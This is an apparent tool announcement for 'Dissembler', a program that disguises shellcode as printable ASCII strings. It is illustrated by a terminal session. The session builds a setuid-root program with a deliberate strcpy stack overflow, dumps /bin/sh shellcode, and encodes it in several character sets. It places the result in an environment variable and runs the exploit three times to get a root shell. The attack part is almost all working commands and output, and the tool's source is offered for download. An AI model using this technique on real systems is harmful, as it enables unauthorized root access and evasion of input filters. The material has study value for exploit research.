‘Dissembler – Polymorphs Bytecode to a Printable ASCII String’

Summary

Credit:

‘To keep updated with the tool visit the project’s homepage at: http://www.phiral.com/research/dissembler.html


Details

‘Like a wolf in sheeps clothing, evil byte code that has been dissembled looks like an innocent string.

dissemble – dis’sem’ble
1. To disguise or conceal behind a false appearance
2. To make a false show of; feign

Eaxmple Run:
matrix@overdose v0.9 $ gcc -o dissembler dissembler.c
matrix@overdose v0.9 $ ./dissembler
dissembler 0.9 – polymorphs bytecode to a printable ASCII string

Usage: ./dissembler [switches] bytecode

Optional dissembler switches:
-t <target address> near where the bytecode is going
-N optimize with ninja magic
-s <original size> size changes target, adjust with orig size
-b <NOP bridge size> number of words in the NOP bridge
-c <charset> which chars are considered printable
-w <output file> write dissembled code to output file
-e escape the backlash in output

matrix@overdose v0.9 $ cat vuln2.c
int main(int argc, char *argv[])
{
char buffer[5];
strcpy(buffer, argv[1]);
return 0;
}
matrix@overdose v0.9 $ gcc -o vuln2 vuln2.c
matrix@overdose v0.9 $ sudo chown root.root vuln2
matrix@overdose v0.9 $ sudo chmod +s vuln2
matrix@overdose v0.9 $ ls -l vuln2
-rwsr-sr-x 1 root root 5050 Mar 18 16:28 vuln2
matrix@overdose v0.9 $ od -h -c shellcode
0000000 c031 46b0 db31 c931 80cd 16eb 315b 88c0
1 300 260 F 1 333 1 311 315 200 353 026 [ 1 300 210
0000020 0743 5b89 8908 0c43 0bb0 4b8d 8d08 0c53
C a 211 [ b 211 C f 260 v 215 K b 215 S f
0000040 80cd e5e8 ffff 2fff 6962 2f6e 6873
315 200 350 345 377 377 377 / b i n / s h
0000056
matrix@overdose v0.9 $ ./dissembler -e -b 300 shellcode
dissembler 0.9 – polymorphs bytecode to a printable ASCII string

[e] Escape the backslash: ON
[b] Bridge size: 300 words
[*] Dissembling bytecode from ‘shellcode’…

[+] dissembled bytecode is 505 bytes long.

%K-4N%4BJ0-QQQQ-naay-aMMuP\-EnE2–bG%P-%—-%zzz-%XiWP-MWyy-sxsv -WzuyP-3JJ4–Wp%-58x%P-SISz-swqyP-hhh6-uuu%-maz%P-VVVM-dZQ5P-RyRQ -wYr0P-m%ym-hLohP-ZZ-Z-3y2%–z-1P-KKFF-67V_P-z2zz-8888-nKMhP-__I_- hh%h-982hPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
matrix@overdose v0.9 $ export SHELL=%K-4N%4BJ0-QQQQ-naay-aMMuP\-EnE2–bG%P-%—-%zzz- %XiWP-MWyy-sxsv-WzuyP-3JJ4–Wp%-58x%P-SISz-swqyP-hhh6-uuu%- maz%P-VVVM-dZQ5P-RyRQ-wYr0P-m%ym-hLohP-ZZ-Z-3y2%–z-1P- KKFF-67V_P-z2zz-8888-nKMhP-__I_-hh%h-982hPPPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
matrix@overdose v0.9 $ echo ‘main(){printf(‘%pn’, getenv(‘SHELL’));}’>q.c;gcc -o q.ert q.c;./q.ert;rm q.*
0xbffff974
matrix@overdose v0.9 $ ./vuln2 `perl -e ‘print ‘x74xf9xffxbf’x8;’`
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b# exit
exit
matrix@overdose v0.9 $ export SHELL=`./dissembler -N -t 0xbffff974 -s 505 shellcode`
dissembler 0.9 – polymorphs bytecode to a printable ASCII string

[N] Ninja Magic Optimization: ON
[t] Target address: 0xbffff974
[s] Size changes target: ON (adjust size: 505 bytes)
[+] Ending address: 0xbffffa8c
[*] Dissembling bytecode from ‘shellcode’…
[&] Optimizing with ninja magic…
[&] Adjusting target address to 0xbffffaa6..
[&] Optimizing with ninja magic…
[&] Adjusting target address to 0xbffffaab..

[+] dissembled bytecode is 194 bytes long.

matrix@overdose v0.9 $ env | grep SHELL
SHELL=%GKCR%004%-tDDt-xldd-ySWgP-X33z-dK4d-qM%yP-%jjj-%aqa-%453P-oooy -Vhzz-RrxuP-0LL4-0Kq%-5Bu%P-WWWz-oimyP-kkk6-kkr%-thz%P-S9S5-gwTMP-tztO -UXP2P-d0nd-qAzqP-YY5Y-4z%%–z22P-T2TT–PHQP-jUjj-T3TZ-b-AVP
matrix@overdose v0.9 $ ./vuln2 `perl -e ‘print ‘xabxfaxffxbf’x8;’`
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b# exit
exit
matrix@overdose v0.9 $ export SHELL=`./dissembler -N -t 0xbffff974 -s 505 -c BP07frz-% shellcode`
dissembler 0.9 – polymorphs bytecode to a printable ASCII string
– Jon Erickson <matrix@phiral.com> Phiral Research Labs –
438C 0255 861A 0D2A 6F6A 14FA 3229 4BD7 5ED9 69D0

[N] Ninja Magic Optimization: ON
[t] Target address: 0xbffff974
[s] Size changes target: ON (adjust size: 505 bytes)
[c] Using charset: BP07frz-% (9)
[+] Ending address: 0xbffffa8c
[*] Dissembling bytecode from ‘shellcode’…
[&] Optimizing with ninja magic…
[&] Adjusting target address to 0xbffffa60..

[+] dissembled bytecode is 269 bytes long.

matrix@overdose v0.9 $ env | grep SHELL
SHELL=%PBPB%-0-0-7%%%-r-0r-B70B-zzzfP-f-ff-%7BP-r%rP-0BrPP-rrPr-f7-7-%0f0-r%-%P -rrrr-0zzB-P0PB-%-%rP-zz%B-7zPP-rrzr-rrBzP-0-zz-ff%7-0-%BP-BB%B-rffr-ffff-00ffP–BPf –zr7-0zrr-0zrrP-70r7-Br%%-P0-%P-BPBB-7-P7-%z%%-7z07P–fz—rr–0%P0-0PP%P-7 –7-%0B7-%%-7P-P%%P-000f-P007-P0z-P
matrix@overdose v0.9 $ ./vuln2 `perl -e ‘print ‘x60xfaxffxbf’x8;’`
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b# exit
exit
matrix@overdose v0.9 $

Download Information:
Te tool’s source can be found at: http://www.phiral.com/research/dissembler_0.9.tgz

Categories: Tools